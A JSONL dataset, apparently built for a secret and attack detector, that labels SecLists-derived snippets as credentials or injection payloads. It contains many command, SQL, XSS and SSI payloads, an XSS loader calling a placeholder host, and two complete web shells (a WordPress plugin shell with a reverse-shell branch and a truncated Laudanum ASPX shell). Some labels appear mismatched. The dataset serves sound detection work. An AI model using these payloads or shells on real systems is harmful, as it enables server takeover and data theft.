"REDIS_URL=redis://default:graham@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "graham"}}]} {"id": "seclists_02534", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf &#X0003c;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#X0003c;", "injection_type": "cmd"}}]} {"id": "seclists_02535", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \"&&echo$IFSWPYOYT$((86%2B46))$(echo$IFSWPYOYT)WPYOYT//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"&&echo$IFSWPYOYT$((86%2B46))$(echo$IFSWPYOYT)WPYOYT//", "injection_type": "cmd"}}]} {"id": "seclists_02536", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:damien", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "damien"}}]} {"id": "seclists_02537", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/passwd HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ".\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/passwd", "injection_type": "cmd"}}]} {"id": "seclists_02538", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = or 'text' = n'text'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 'text' = n'text'", "injection_type": "SQL"}}]} {"id": "seclists_02539", "source": "seclists", "source_license": "MIT", "text": "<?php\n /*\n Plugin Name: Cheap & Nasty Wordpress Shell\n Plugin URI: https://github.com/leonjza/wordpress-shell\n Description: Execute Commands as the webserver you are serving wordpress with! Shell will probably live at /wp-content/plugins/shell/shell.php. Commands can be given using the 'cmd' GET parameter. Eg: \"http://192.168.0.1/wp-content/plugins/shell/shell.php?cmd=id\", should provide you with output such as <code>uid=33(www-data) gid=verd33(www-data) groups=33(www-data)</code>\n Author: Leon Jacobs\n Version: 0.3\n Author URI: https://leonjza.github.io\n */\n\n# attempt to protect myself from deletion\n$this_file = __FILE__;\n@system(\"chmod ugo-w $this_file\");\n@system(\"chattr +i $this_file\");\n\n# Name of the parameter (GET or POST) for the command. Change this if the target already use this parameter.\n$cmd = 'cmd';\n\n# test if parameter 'cmd', 'ip or 'port' is present. If not this will avoid an error on logs or on all pages if badly configured.\nif(isset($_REQUEST[$cmd])) {\n\n # grab the command we want to run from the 'cmd' GET or POST parameter (POST don't display the command on apache logs)\n $command = $_REQUEST[$cmd];\n executeCommand($command);\n \n} else if(isset($_REQUEST[$ip]) && !isset($_REQUEST[$cmd])) {\n\n $ip = $_REQUEST[$ip];\n \n # default port 443\n $port = '443';\n \n if(isset($_REQUEST[$port])){\n $port = $_REQUEST[$port];\n }\n \n # nc -nlvp 443\n $sock = fsockopen($ip,$port);\n $command = '/bin/sh -i <&3 >&3 2>&3';\n \n executeCommand($command);\n \n}\n\ndie();\n\nfunction executeCommand(string $command) {\n\n # Try to find a way to run our command using various PHP internals\n if (class_exists('ReflectionFunction')) {\n\n # http://php.net/manual/en/class.reflectionfunction.php\n $function = new ReflectionFunction('system');\n $function->invoke($command);\n\n } elseif (function_exists('call_user_func_array')) {\n\n # http://php.net/manual/en/function.call-user-func-array.php\n call_user_func_array('system', array($command));\n\n } elseif (function_exists('call_user_func')) {\n\n # http://php.net/manual/en/function.call-user-func.php\n call_user_func('system', $command);\n \n } else if(function_exists('passthru')) {\n \n # https://www.php.net/manual/en/function.passthru.php\n ob_start();\n passthru($command , $return_var);\n $output = ob_get_contents();\n ob_end_clean();\n\n } else if(function_exists('system')){\n\n # this is the last resort. chances are PHP Suhosin\n # has system() on a blacklist anyways :>\n\n # http://php.net/manual/en/function.system.php\n system($command);\n }\n}\n", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "plugin-shell.php"}}]} {"id": "seclists_02540", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=smirnoff\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "smirnoff"}}]} {"id": "seclists_02541", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=invest\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "invest"}}]} {"id": "seclists_02542", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<area onblur=alert(1) tabindex=1 id=x></area><input autofocus> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<area onblur=alert(1) tabindex=1 id=x></area><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_02543", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf \\\\\\\\?\\\\", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\\\\\\\?\\\\", "injection_type": "cmd"}}]} {"id": "seclists_02544", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: &echo$IFSZJOTOV$((13%2B82))$(echo$IFSZJOTOV)ZJOTOV&", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&echo$IFSZJOTOV$((13%2B82))$(echo$IFSZJOTOV)ZJOTOV&", "injection_type": "cmd"}}]} {"id": "seclists_02545", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Shiva,root,<BLANK>,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Shiva,root,<BLANK>,"}}]} {"id": "seclists_02546", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Tellabs,tellabs,tellabs#1,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Tellabs,tellabs,tellabs#1,"}}]} {"id": "seclists_02547", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf &#0060;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#0060;", "injection_type": "cmd"}}]} {"id": "seclists_02548", "source": "seclists", "source_license": "MIT", "text": "filename=%2e%2e%2f", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2e%2e%2f", "injection_type": "cmd"}}]} {"id": "seclists_02549", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf \" or 1=1--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\" or 1=1--", "injection_type": "cmd"}}]} {"id": "seclists_02550", "source": "seclists", "source_license": "MIT", "text": "GET /profile?name=settings.DATABASES HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "settings.DATABASES", "injection_type": "SSTI"}}]} {"id": "seclists_02551", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: a;/usr/bin/id|", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "a;/usr/bin/id|", "injection_type": "cmd"}}]} {"id": "seclists_02552", "source": "seclists", "source_license": "MIT", "text": "POST /api/login HTTP/1.1\nContent-Type: application/json\n\n'%20%26%26%20this.password.match(/.*/)//+%00", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%20%26%26%20this.password.match(/.*/)//+%00", "injection_type": "NoSQL"}}]} {"id": "seclists_02553", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '\") or true--';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\") or true--", "injection_type": "SQL"}}]} {"id": "seclists_02554", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %99999999999s", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%99999999999s", "injection_type": "cmd"}}]} {"id": "seclists_02555", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=caligula\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "caligula"}}]} {"id": "seclists_02556", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: &lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;", "injection_type": "cmd"}}]} {"id": "seclists_02557", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:auto@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "auto"}}]} {"id": "seclists_02558", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %2522%7C%20%5B%202%20-ne%20%24%28echo%20BILMTI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%7C%20%5B%202%20-ne%20%24%28echo%20BILMTI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F", "injection_type": "cmd"}}]} {"id": "seclists_02559", "source": "seclists", "source_license": "MIT", "text": "GET /api/user?filter=%7C HTTP/1.1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C", "injection_type": "LDAP"}}]} {"id": "seclists_02560", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: <BODY BACKGROUND=\"javascript:alert('XSS');\">\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <BODY BACKGROUND=\"javascript:alert('XSS');\">", "injection_type": "XSS"}}]} {"id": "seclists_02561", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: &#X0003C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#X0003C", "injection_type": "cmd"}}]} {"id": "seclists_02562", "source": "seclists", "source_license": "MIT", "text": "filename=%0aecho$IFSEMHHKB$((6%2B28))$(echo$IFSEMHHKB)EMHHKB", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0aecho$IFSEMHHKB$((6%2B28))$(echo$IFSEMHHKB)EMHHKB", "injection_type": "cmd"}}]} {"id": "seclists_02563", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>", "injection_type": "XSS"}}]} {"id": "seclists_02564", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%7C%20%5B%207%20-ne%20%24%28echo%20QJDBJN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%207%20-ne%20%24%28echo%20QJDBJN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27", "injection_type": "cmd"}}]} {"id": "seclists_02565", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<div draggable=\"true\" contenteditable>drag me</div><abbr ondragover=alert(1) contenteditable>drop here</abbr> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><abbr ondragover=alert(1) contenteditable>drop here</abbr>", "injection_type": "XSS"}}]} {"id": "seclists_02566", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \"%26echo$IFSTYVQZP$((31%2B21))$(echo$IFSTYVQZP)TYVQZP%26", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"%26echo$IFSTYVQZP$((31%2B21))$(echo$IFSTYVQZP)TYVQZP%26", "injection_type": "cmd"}}]} {"id": "seclists_02567", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: This uses a very tiny trick that appears to work Firefox only, because if it's implementation of the \u201dfeeling lucky\u201d function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera.\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This uses a very tiny trick that appears to work Firefox only, because if it's implementation of the \u201dfeeling lucky\u201d function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera.", "injection_type": "XSS"}}]} {"id": "seclists_02568", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C", "injection_type": "cmd"}}]} {"id": "seclists_02569", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %22&&echo%20IMYKBH$((59%2B74))$(echo%20IMYKBH)IMYKBH%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22&&echo%20IMYKBH$((59%2B74))$(echo%20IMYKBH)IMYKBH%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_02570", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %2C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2C", "injection_type": "cmd"}}]} {"id": "seclists_02571", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<rp oncut=\"alert(1)\" contenteditable>test</rp> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<rp oncut=\"alert(1)\" contenteditable>test</rp>", "injection_type": "XSS"}}]} {"id": "seclists_02572", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"http_accept_language\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"http_accept_language\" -->", "injection_type": "SSI"}}]} {"id": "seclists_02573", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<textarea draggable=\"true\" ondragenter=\"alert(1)\">test</textarea>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<textarea draggable=\"true\" ondragenter=\"alert(1)\">test</textarea>", "injection_type": "XSS"}}]} {"id": "seclists_02574", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %22%26%26echo$IFSTNMDEE$((29%2B83))$(echo$IFSTNMDEE)TNMDEE|", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%26%26echo$IFSTNMDEE$((29%2B83))$(echo$IFSTNMDEE)TNMDEE|", "injection_type": "cmd"}}]} {"id": "seclists_02575", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<x contenteditable oninput=alert(1)>input here!\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x contenteditable oninput=alert(1)>input here!", "injection_type": "XSS"}}]} {"id": "seclists_02576", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Name: JavaScript Link Location\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: JavaScript Link Location", "injection_type": "XSS"}}]} {"id": "seclists_02577", "source": "seclists", "source_license": "MIT", "text": "filename=%22%0A%20str%3D%24%28echo%20NFJEZO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%0A%20str%3D%24%28echo%20NFJEZO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522", "injection_type": "cmd"}}]} {"id": "seclists_02578", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Name: IMG No Quotes/Semicolon</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: IMG No Quotes/Semicolon", "injection_type": "XSS"}}]} {"id": "seclists_02579", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><br id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></br> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><br id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></br>", "injection_type": "XSS"}}]} {"id": "seclists_02580", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e", "injection_type": "cmd"}}]} {"id": "seclists_02581", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = admin') or ('1'='1'--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin') or ('1'='1'--", "injection_type": "SQL"}}]} {"id": "seclists_02582", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ${popen(print(`echo%20IWFPXG;echo%20$((92%2B70));echo%20IWFPXG;echo%20IWFPXG`)%3BIWFPXG", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "${popen(print(`echo%20IWFPXG;echo%20$((92%2B70));echo%20IWFPXG;echo%20IWFPXG`)%3BIWFPXG", "injection_type": "cmd"}}]} {"id": "seclists_02583", "source": "seclists", "source_license": "MIT", "text": "username=limit&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "limit", "injection_type": "SQL"}}]} {"id": "seclists_02584", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<x 1='1'onxxx=1\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x 1='1'onxxx=1", "injection_type": "XSS"}}]} {"id": "seclists_02585", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: &#0060", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#0060", "injection_type": "cmd"}}]} {"id": "seclists_02586", "source": "seclists", "source_license": "MIT", "text": "<?xml version=\"1.0\"?>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>", "injection_type": "XXE"}}]} {"id": "seclists_02587", "source": "seclists", "source_license": "MIT", "text": "password: Linksys,user,tivonpw,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Linksys,user,tivonpw,"}}]} {"id": "seclists_02588", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><x contenteditable onkeydown=alert(1)>press any key!</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x contenteditable onkeydown=alert(1)>press any key!", "injection_type": "XSS"}}]} {"id": "seclists_02589", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: )", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ")", "injection_type": "cmd"}}]} {"id": "seclists_02590", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Mozilla -moz-binding-url injection\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Mozilla -moz-binding-url injection", "injection_type": "XSS"}}]} {"id": "seclists_02591", "source": "seclists", "source_license": "MIT", "text": "filename=%2522%3B%20str%3D%24%28echo%20GJYXKU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%3B%20str%3D%24%28echo%20GJYXKU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526", "injection_type": "cmd"}}]} {"id": "seclists_02592", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: <LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>", "injection_type": "XSS"}}]} {"id": "seclists_02593", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %3B%20str%3D%24%28echo%20OTXVUR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3B%20str%3D%24%28echo%20OTXVUR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//", "injection_type": "cmd"}}]} {"id": "seclists_02594", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf a;id", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "a;id", "injection_type": "cmd"}}]} {"id": "seclists_02595", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit String: <!--#exec cmd=\"/bin/echo '<SCRIPT SRC'\"--><!--#exec cmd=\"/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'\"--></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <!--#exec cmd=\"/bin/echo '<SCRIPT SRC'\"--><!--#exec cmd=\"/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'\"-->", "injection_type": "XSS"}}]} {"id": "seclists_02596", "source": "seclists", "source_license": "MIT", "text": "<%@ Page Language=\"C#\"%>\n<%@ Import Namespace=\"System\" %>\n\n<script runat=\"server\">\n\n/* *****************************************************************************\n***\n*** Laudanum Project\n*** A Collection of Injectable Files used during a Penetration Test\n***\n*** More information is available at:\n*** http://laudanum.secureideas.net\n*** laudanum@secureideas.net\n***\n*** Project Leads:\n*** Kevin Johnson <kjohnson@secureideas.net>\n*** Tim Medin <tim@counterhack.com>\n***\n*** Copyright 2014 by Kevin Johnson and the Laudanum Team\n***\n********************************************************************************\n***\n*** This file provides shell access to the system.\n***\n********************************************************************************\n*** This program is free software; you can redistribute it and/or\n*** modify it under the terms of the GNU General Public License\n*** as published by the Free Software Foundation; either version 2\n*** of the License, or (at your option) any later version.\n***\n*** This program is distributed in the hope that it will be useful,\n*** but WITHOUT ANY WARRANTY; without even the implied warranty of\n*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n*** GNU General Public License for more details.\n***\n*** You can get a copy of the GNU General Public License from this\n*** address: http://www.gnu.org/copyleft/gpl.html#SEC1\n*** You can also write to the Free Software Foundation, Inc., 59 Temple\n*** Place - Suite 330, Boston, MA 02111-1307, USA.\n***\n***************************************************************************** */\n\nstring stdout = \"\";\nstring stderr = \"\";\n\nvoid die() {\n\t//HttpContext.Current.Response.Clear();\n\tHttpContext.Current.Response.StatusCode = 404;\n\tHttpContext.Current.Response.StatusDescription = \"Not Found\";\n\tHttpContext.Current.Response.Write(\"<h1>404 Not Found</h1>\");\n\tHttpContext.Current.Server.ClearError();\n\tHttpContext.Current.Response.End();\n}\n\nvoid Page_Load(object sender, System.EventArgs e) {\n\n\t// Check for an IP in the range we want\n\tstring[] allowedIps = new string[] {\"::1\",\"192.168.0.1\", \"127.0.0.1\"};\n\t\n\t// check if the X-Fordarded-For header exits\n\tstring remoteIp;\n\tif (HttpContext.Current.Request.Headers[\"X-Forwarded-For\"] == null) {\n\t\tremoteIp = Request.UserHostAddress;\n\t} else {\n\t\tremoteIp = HttpContext.Current.Request.Headers[\"X-Forwarded-For\"].Split(new char[] { ',' })[0]; \n\t}\n\n\tbool validIp = false;\n\tforeach (string ip in allowedIps) {\n\t\tvalidIp = (validIp || (remoteIp == ip));\n\t}\n\t\n\tif (!validIp) {\n\t\tdie();\n\t}\n\t\n\tif (Request.Form[\"c\"] != null) {\n\t// do or do not, there is no try\n\t//try {\n\t\t// create the ProcessStartInfo using \"cmd\" as the program to be run, and \"/c \" as the parameters.\n\t\t// \"/c\" tells cmd that we want it to execute the command that follows, and exit.\n\t\tSystem.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo(\"cmd\", \"/c \" + Request.Form[\"c\"]);\n\n\t\t// The following commands are needed to redirect the standard output and standard error.\n\t\tprocStartInfo.RedirectStandardOutput = true;\n\t\tprocStartInfo.RedirectStandardError = true;\n\t\tprocStartInfo.UseShellExecute = 